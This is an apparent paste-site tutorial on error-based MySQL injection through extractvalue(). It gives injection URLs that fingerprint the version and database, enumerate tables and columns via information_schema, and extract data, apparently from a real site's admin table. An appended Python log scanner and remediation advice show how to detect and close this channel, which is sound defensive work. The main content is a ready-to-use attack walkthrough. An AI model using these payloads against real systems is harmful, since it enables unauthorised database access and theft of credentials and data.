Kyfx

XPATH Injection Using Extractvalue

Jul 25th, 2015
  1. Let's start our XPATH injection.
  2. Here is a target; let's find the version with XPATH.
  3. Here is our query for finding the version in XPATH:
  4.  
  5. XPATH QUERY: and extractvalue(0x3a,concat(0x3a,version()))
  6.  
  7. Let's execute this query on our target site.
  8. http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,version()))-- -
  9.  
  10. So this is the version: XPATH syntax error: ':5.5.42-37.1-log'
  11. Now let's check the current database name.
  12.  
  13. Here is the query for finding the current database name:
  14.  
  15. XPATH QUERY: and extractvalue(0x3a,concat(0x3a,database()))
  16.  
  17. Execute this query on our target site.
  18.  
  19. http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,database()))-- -
  20.  
  21. This is the current database name: XPATH syntax error: ':dealitea_dealiteasy'
  22. Now let's move on to further injection.
  23. Next is to find the table names in the database.
  24. Here is the query for finding the table name:
  25.  
  26. XPATH QUERY: and extractvalue(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database())))
  27. Because we are injecting through XPATH, we can't get all the tables at once, so we need to add LIMIT to our query to get the tables one by one.
  28. So let's add LIMIT to our query.
  29. XPATH QUERY: and extractvalue(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)))
  30.  
  31. Now execute this query on the target site to find the tables.
  32.  
  33.  
  34. http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)))-- -
  35. Increase the limit to get the other tables in the current database.
  36. Here we got the admin table: XPATH syntax error: ':deal_admin'
  37.  
  38. Let's get the columns from this table.
  39. Here is our query for getting the columns from the table.
  40. XPATH QUERY:
  41. and extractvalue(0x3a,concat(0x3a,(select concat(column_name) from information_schema.columns where table_name=OUR_TABLE_NAME_HERE limit 0,1)))--
  42.  
  43. We execute this query to get the columns.
  44.  
  45. http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,(select concat(column_name) from information_schema.columns where table_name=OUR_TABLE_NAME_HERE limit 0,1)))-- -
  46.  
  47. Increase the limit for the other columns in the table.
  48. The final part is extracting data from the columns.
  49. So here is our final query:
  50. XPATH QUERY: and extractvalue(0x3a,concat(0x3a,(select concat(COLUMN_NAME_HERE) from TABLE_NAME_HERE)))-- -
  51. Execute this query on the target site to extract the column data from the target table.
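
Defender's view of the requests above, as an added example that is not part of the original paste: a Python scan that flags extractvalue()-style error-based probes in web access logs and checks whether a response body exposes the 'XPATH syntax error' message. The log lines, IPs, tag names and function names are constructed for illustration; updatexml() is included as an assumption because it raises the same MySQL error.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (documentation IPs, placeholder paths).
SAMPLE_LOG = [
    '198.51.100.4 - - [25/Jul/2015:10:00:01 +0000] "GET /detail.php?id=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [25/Jul/2015:10:02:11 +0000] "GET /detail.php?id=1%20and%20'
    'extractvalue(0x3a,concat(0x3a,version()))--%20- HTTP/1.1" 200 312',
    '203.0.113.7 - - [25/Jul/2015:10:03:40 +0000] "GET /detail.php?id=1+AND+ExtractValue'
    '(0x3a,concat(0x3a,(select+table_name+from+information_schema.tables+'
    'where+table_schema=database()+limit+3,1)))--+- HTTP/1.1" 200 305',
    '203.0.113.9 - - [25/Jul/2015:10:05:02 +0000] "GET /detail.php?id=1%2520and%2520'
    'extractvalue(1,concat(0x3a,database())) HTTP/1.1" 200 301',
    '198.51.100.4 - - [25/Jul/2015:10:06:00 +0000] "GET /search.php?q=limit+1,1+offer HTTP/1.1" 200 900',
]

REQ = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
RULES = {  # tag -> pattern, applied to the decoded, lower-cased query string
    "xpath-error-function": re.compile(r"\b(?:extractvalue|updatexml)\s*\("),
    "schema-enumeration": re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b"),
    "row-stepping": re.compile(r"\blimit\s+\d+\s*,\s*1\b"),
    "fingerprinting": re.compile(r"\b(?:version|database)\s*\(\s*\)"),
}

def normalize(target):
    """Return the query string URL-decoded (bounded repeats), whitespace-collapsed, lower-cased."""
    query = target.partition("?")[2]
    for _ in range(3):  # undo nested URL-encoding without looping forever
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return re.sub(r"\s+", " ", query).lower()

def classify(target):
    """Tags for one request target; empty unless an XML error function call is present."""
    query = normalize(target)
    tags = {name for name, rx in RULES.items() if rx.search(query)}
    return tags if "xpath-error-function" in tags else set()

def scan(lines):
    """Map client IP -> union of tags seen across its flagged requests."""
    hits = {}
    for line in lines:
        m = REQ.match(line)
        tags = classify(m.group(2)) if m else set()
        if tags:
            hits.setdefault(m.group(1), set()).update(tags)
    return hits

def leaks_db_error(body):
    """True when a response body shows the MySQL XPath error text to the client."""
    return "xpath syntax error" in body.lower()
```

Detection like this is a safety net: binding the id parameter in a prepared statement and keeping database error text out of HTTP responses removes the channel the paste relies on.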